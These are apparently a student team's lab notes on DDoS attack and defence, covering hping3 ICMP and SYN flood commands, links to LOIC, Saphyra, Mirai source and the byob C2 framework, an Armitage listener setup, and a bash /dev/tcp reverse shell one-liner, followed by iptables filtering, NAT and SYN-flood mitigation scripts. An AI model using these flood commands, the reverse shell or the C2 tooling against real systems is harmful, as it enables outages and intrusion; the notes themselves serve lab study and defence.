# DDOS
[TOC]
https://github.com/jgamblin/Mirai-Source-Code/blob/master/ForumPost.md
-----
# Division of work
## Techniques used
Attacker
- Attack scripts
- Research the latest attack techniques
Defender
- ML
- Research defence techniques
Env (for experiments)
- Build a lab environment or find a physical one
-----
# Attack targets
## Bandwidth

A paper reports attack traffic reaching 1.7 Tb/s.
## Memory
# Attack tools
## Low Orbit Ion Cannon (LOIC)
https://github.com/NewEraCracker/LOIC
Linux: requires mono
https://www.monodevelop.com/download/#fndtn-download-lin
```
apt-get install mono-complete
```
## hping3
### ICMP flooding
-> attacks bandwidth
```
hping3 -1 --flood <ip address>
```
`-1` puts hping3 in ICMP mode (echo request); `--flood` sends packets as fast as possible without waiting for replies.

Observe the traffic in Wireshark.

Defence -> drop or disable ICMP. Caveat: dropping all ICMP also breaks path MTU discovery and ping-based monitoring, so rate-limiting echo requests is usually preferable to blocking the protocol.
### SYN flooding
```
hping3 -d 200 -p 80 -S --flood <ip address>
```
Target in this example: 192.168.86.181
`-d 200` -> 200-byte data payload; `-p 80` -> destination port 80; `-S` -> set the SYN flag.
hping3 sends from a single source address unless `--rand-source` is given, so a per-source rate limit stops the plain form but not a spoofed-source flood.

Defence -> firewall (rate-limit new connections per source) plus kernel SYN cookies (`net.ipv4.tcp_syncookies=1`) for the spoofed case.
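As an added example (not part of the original notes, and not hping3's or any project's own code), the following script makes an hping3 SYN flood visible by counting SYN packets per second in `tcpdump -nn -tt` output and reporting how many distinct sources they came from. The capture lines it processes are constructed here, and the threshold, interface and addresses are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): make an hping3 SYN flood visible
# by counting SYN packets per second in tcpdump output.
#
# Real usage (interface and port are assumptions):
#   tcpdump -nn -tt -i eth0 'tcp[tcpflags] & tcp-syn != 0 and dst port 80' | syn_rate 50
#
# tcpdump -nn -tt prints lines like:
#   1700000001.005000 IP 192.168.86.10.1024 > 192.168.86.181.80: Flags [S], seq 0, win 512, length 200
# so $1 is the epoch timestamp, $3 the source addr.port and $7 the TCP flags.

# syn_rate [threshold]: print one ALERT line for every second whose SYN count
# exceeds the threshold, with the number of distinct source IPs in that second
# (1 for a plain hping3 -S --flood, many for --rand-source).
syn_rate() {
    thr="${1:-50}"
    awk -v thr="$thr" '
    $2 == "IP" && $6 == "Flags" && $7 ~ /^\[S\]/ {
        sec = int($1)
        src = $3; sub(/\.[0-9]+$/, "", src)       # strip the source port
        syn[sec]++
        key = sec SUBSEP src
        if (!(key in seen)) { seen[key] = 1; srcs[sec]++ }
    }
    END {
        for (sec in syn)
            if (syn[sec] > thr)
                printf "ALERT second=%d syn=%d distinct_sources=%d\n", sec, syn[sec], srcs[sec]
    }' | sort
}

# sample_capture: constructed tcpdump-style lines, not a real capture.
# Second ...000: one normal handshake.  Second ...001: 120 SYNs from one host
# (hping3 -S -d 200 --flood).  Second ...002: 60 SYNs from 60 spoofed sources.
sample_capture() {
    printf '1700000000.100000 IP 192.168.86.20.51000 > 192.168.86.181.80: Flags [S], seq 1, win 64240, length 0\n'
    printf '1700000000.200000 IP 192.168.86.181.80 > 192.168.86.20.51000: Flags [S.], seq 2, ack 2, win 65160, length 0\n'
    printf '1700000000.300000 IP 192.168.86.20.51000 > 192.168.86.181.80: Flags [.], ack 1, win 502, length 0\n'
    i=0
    while [ "$i" -lt 120 ]; do
        printf '1700000001.%06d IP 192.168.86.10.%d > 192.168.86.181.80: Flags [S], seq 0, win 512, length 200\n' \
            $((i * 5000)) $((1024 + i))
        i=$((i + 1))
    done
    i=0
    while [ "$i" -lt 60 ]; do
        printf '1700000002.%06d IP 10.%d.%d.%d.2000 > 192.168.86.181.80: Flags [S], seq 0, win 512, length 0\n' \
            $((i * 10000)) $((i % 7)) $((i % 5)) $((i + 1))
        i=$((i + 1))
    done
}

# Run the constructed capture through the detector: sh file.sh demo
if [ "${1:-}" = "demo" ]; then
    sample_capture | syn_rate 50
fi
```

The distinct-source count is what separates the two flood shapes: a single-source flood from the plain command is a candidate for a per-source firewall limit, while a second with as many sources as SYNs points to `--rand-source` and needs SYN cookies or upstream filtering instead.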
## Saphyra
### HTTP GET flood
Rotates the User-Agent (HTTP header) across requests to evade firewall/WAF filtering that matches on a fixed client signature.
HTTP GET -> repeated requests to the target host
Script:
https://github.com/IkzCx/ProgramsForDDos/blob/master/Saphyra.py

# analysis tool
## nload
Usage
```
nload
```
# C2 server
## byob
[byob](https://bit.ly/30tJm22)
Docs:
https://github.com/malwaredllc/byob/wiki
## Linux environment setup
[video1](https://www.youtube.com/watch?v=uVyniPrTzuk)
[video2](https://www.youtube.com/watch?v=eYk9zWNH5ws)
[video3](https://www.youtube.com/watch?v=dE-I5xKtmso)
```
git clone https://github.com/malwaredllc/byob.git
```
---
https://github.com/malwaredllc/byob/wiki/Installing-Requirements-on-Linux
```
apt install python2
```
Run setup.py
## Armitage
https://github.com/Intek13x/armitage

## Creating a listener in Armitage

Connection settings used:
```
host: 127.0.0.1
port: 55555
account: meowhecker
password: meowhecker
```
Reverse shell payload: connects back to 192.168.203.151:443 through bash's `/dev/tcp` on file descriptor 103 and attaches `sh`'s stdin, stdout and stderr to the socket.
```
bash -c '0<&103-;exec 103<>/dev/tcp/192.168.203.151/443;sh <&103 >&103 2>&103'
```


## IEEE paper
### [Intelligent Detection System for a Distributed Denial-of-Service (DDoS) Attack Based on Time Series](https://ieeexplore.ieee.org/document/10100180/)
# Analysis of hping3 attack behaviour

# iptables
Linux firewall
### Flags
- `-t <table>` table to operate on (filter, nat, ...)
- `-A <chain>` append a rule to the end of the chain
- `-I <chain> [n]` insert a rule at position n (default = 1, the top of the chain)
- `-D <chain> <n>` delete the rule at position n
- `-L` list the rules of a table
- `-v` verbose
## Filter Table
### INPUT chain (inbound)
Add a new rule
```
iptables -t filter -A INPUT -j DROP -p tcp --dport 80
```
Drops all inbound TCP traffic to port 80. Rules are evaluated top to bottom and the first match wins, so an appended DROP only takes effect if no earlier rule already ACCEPTs the packet.

Delete a rule
```
iptables -t filter -D INPUT 1
```
Deletes the first rule in the INPUT chain (rules are numbered from 1).

### OUTPUT chain (outbound)
Before the rule:
```
ping 192.168.203.151
PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
64 bytes from 192.168.203.151: icmp_seq=1 ttl=64 time=5.23 ms
64 bytes from 192.168.203.151: icmp_seq=2 ttl=64 time=1.02 ms
```
```
iptables -t filter -A OUTPUT -j DROP -p icmp -d 192.168.203.151
```
After the rule the local kernel refuses to send the ICMP packets (sendmsg fails with EPERM), which is how an OUTPUT drop shows up to the sending process:
```
root@ubuntu:/home/user# ping 192.168.203.151
PING 192.168.203.151 (192.168.203.151) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
```
### MAC filter
(works)
```
iptables -A INPUT -m mac --mac-source 00:0c:29:45:2d:c2 -j DROP
```
The mac match is only valid in the PREROUTING, INPUT and FORWARD chains, and it only sees the source MAC of the last layer-2 hop, so it cannot filter traffic that arrived through a router.
## nat table (NAT settings)
Show
```
iptables -t nat -L
```
The nat table has 4 chains:
- PREROUTING (before the routing decision)
  rewrites the destination IP or port (DNAT); used for port forwarding
- INPUT
- OUTPUT
- POSTROUTING (after the routing decision)
  rewrites the source IP or port (SNAT / MASQUERADE)
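As an added example (not from the original notes), the following script wires the two NAT chains above together into a port forward: DNAT in PREROUTING before routing, source rewriting in POSTROUTING after it, with the FORWARD rules the filter table needs in between. The addresses, interface names and ports are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): port forwarding with the nat table.
# Addresses, interface names and ports are assumptions for illustration.
#
# run CMD...: execute CMD, or with DRY_RUN set just print it, so the rule set
# can be reviewed on a machine without root or iptables.
run() {
    if [ -n "${DRY_RUN:-}" ]; then echo "$*"; else "$@"; fi
}

WAN_IF="${WAN_IF:-eth0}"                        # interface facing the clients
LAN_IF="${LAN_IF:-eth1}"                        # interface facing the inside network
INSIDE_HOST="${INSIDE_HOST:-192.168.203.151}"   # web server on the inside network

# port_forward_rules: expose INSIDE_HOST:80 as port 8080 of this box.
port_forward_rules() {
    # The kernel only forwards between interfaces when ip_forward is on.
    run sysctl -w net.ipv4.ip_forward=1
    # PREROUTING runs before the routing decision, so after DNAT rewrites the
    # destination IP/port the packet is routed towards the inside host.
    run iptables -t nat -A PREROUTING -i "$WAN_IF" -p tcp --dport 8080 \
        -j DNAT --to-destination "$INSIDE_HOST:80"
    # The rewritten packet then passes the filter table's FORWARD chain, which
    # must allow it (a default DROP policy would silently eat it).
    run iptables -t filter -A FORWARD -i "$WAN_IF" -p tcp -d "$INSIDE_HOST" --dport 80 \
        -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT
    run iptables -t filter -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # POSTROUTING runs after routing. The DNAT'd packet still carries the
    # client's source address, so the inside host would answer via its own
    # default route; rewriting the source on the LAN side forces the reply
    # back through this box (the inside host then logs this box, not the client).
    run iptables -t nat -A POSTROUTING -o "$LAN_IF" -p tcp -d "$INSIDE_HOST" --dport 80 -j MASQUERADE
    # Classic source rewrite for inside hosts reaching out through the WAN side.
    run iptables -t nat -A POSTROUTING -o "$WAN_IF" -j MASQUERADE
}

# Review without loading: DRY_RUN=1 sh file.sh apply   Load for real (root): sh file.sh apply
if [ "${1:-}" = "apply" ]; then
    port_forward_rules
fi
```

Conntrack undoes both rewrites on the return path, so the client sees replies from this box's port 8080 and never learns the inside address. Drop the LAN-side MASQUERADE if the inside host already uses this box as its default gateway and you want it to see real client addresses.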
## Prevent SYN
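As an added example (not from the original notes), the following filter-table rule set bounds the SYN and ICMP floods from the hping3 section instead of blocking the protocols outright, and enables SYN cookies for the spoofed-source case a per-source limit cannot catch. The port, the rates and the chain name are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): filter-table rules against the
# hping3 SYN and ICMP floods. Port, rates and chain name are assumptions.
#
# run CMD...: execute CMD, or with DRY_RUN set just print it.
run() {
    if [ -n "${DRY_RUN:-}" ]; then echo "$*"; else "$@"; fi
}

# syn_flood_rules: per-source rate limit on new connections to port 80.
syn_flood_rules() {
    # A dedicated chain keeps the guard rules together (flush with -F SYN_GUARD).
    run iptables -t filter -N SYN_GUARD
    # A packet that opens a NEW conntrack entry but is not a clean SYN carries
    # bogus flags (hping3 can craft these); drop it.
    run iptables -t filter -A SYN_GUARD -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
    # hashlimit keeps one token bucket per source IP: up to 20 SYN/s with a
    # burst of 40 pass (RETURN to INPUT), anything faster is dropped.
    # This does not help against --rand-source; SYN cookies cover that.
    run iptables -t filter -A SYN_GUARD -p tcp --syn -m hashlimit --hashlimit-name synguard \
        --hashlimit-mode srcip --hashlimit-upto 20/second --hashlimit-burst 40 -j RETURN
    run iptables -t filter -A SYN_GUARD -p tcp --syn -j DROP
    # Send every inbound SYN for port 80 through the guard, ahead of existing rules.
    run iptables -t filter -I INPUT 1 -p tcp --dport 80 --syn -j SYN_GUARD
}

# icmp_flood_rules: keep ping working but cap echo requests (hping3 -1 --flood).
icmp_flood_rules() {
    run iptables -t filter -A INPUT -p icmp --icmp-type echo-request \
        -m limit --limit 5/second --limit-burst 10 -j ACCEPT
    run iptables -t filter -A INPUT -p icmp --icmp-type echo-request -j DROP
}

# syn_cookies: kernel-side fallback for spoofed-source floods; the SYN backlog
# is not consumed because the server encodes its state in the SYN-ACK.
syn_cookies() {
    run sysctl -w net.ipv4.tcp_syncookies=1
}

# Review without loading: DRY_RUN=1 sh file.sh apply   Load for real (root): sh file.sh apply
if [ "${1:-}" = "apply" ]; then
    syn_flood_rules
    icmp_flood_rules
    syn_cookies
fi
```

The per-source limit is deliberately generous (20 SYN/s) so that a busy legitimate client behind a NAT is not cut off; tune it from a baseline measured with the analysis tools above before relying on it.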